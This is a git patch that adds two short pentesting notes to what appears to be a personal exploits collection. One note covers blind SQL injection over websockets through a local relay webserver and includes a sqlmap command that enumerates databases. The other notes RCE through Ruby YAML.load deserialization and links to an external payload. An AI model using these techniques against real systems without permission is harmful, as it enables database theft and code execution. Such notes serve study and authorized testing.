From 37e21812c15241cb100b362082fb74b8afc56e42 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Thu, 19 Jan 2023 16:17:10 +0100
Subject: [PATCH] bump

---
 Exploits/Databases/Websocket SQLi.md | 13 +++++++++++++
 Exploits/Ruby/yaml_load.md           |  4 ++++
 2 files changed, 17 insertions(+)
 create mode 100644 Exploits/Databases/Websocket SQLi.md
 create mode 100644 Exploits/Ruby/yaml_load.md

diff --git a/Exploits/Databases/Websocket SQLi.md b/Exploits/Databases/Websocket SQLi.md
new file mode 100644
index 0000000..c81cb6f
--- /dev/null
+++ b/Exploits/Databases/Websocket SQLi.md	
@@ -0,0 +1,13 @@
+# Websocket SQLi
+
+* SQLmap is not able to send websocket requests directly because of the id added to the request. Therefore you need a local webserver as a middleware which translates requests to the target. Put in the webserver URL, and the correct data structure into the script and run it.o
+
+```sh
+sqlmap -u "http://127.0.0.1:8081/?id=62009" -p "id" --dbs
+```
+
+## References
+
+* [rayhan0x01's git repo](https://github.com/rayhan0x01/nodejs-websocket-sqli)
+* [rayhan0x01's blog entry](https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html)
+
diff --git a/Exploits/Ruby/yaml_load.md b/Exploits/Ruby/yaml_load.md
new file mode 100644
index 0000000..5ea0f25
--- /dev/null
+++ b/Exploits/Ruby/yaml_load.md
@@ -0,0 +1,4 @@
+# YAML.load deserialization
+
+RCE is is possible via YAML file deserialization through `yaml.load()`.  
+* [staadraad describes how and provides a payload](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)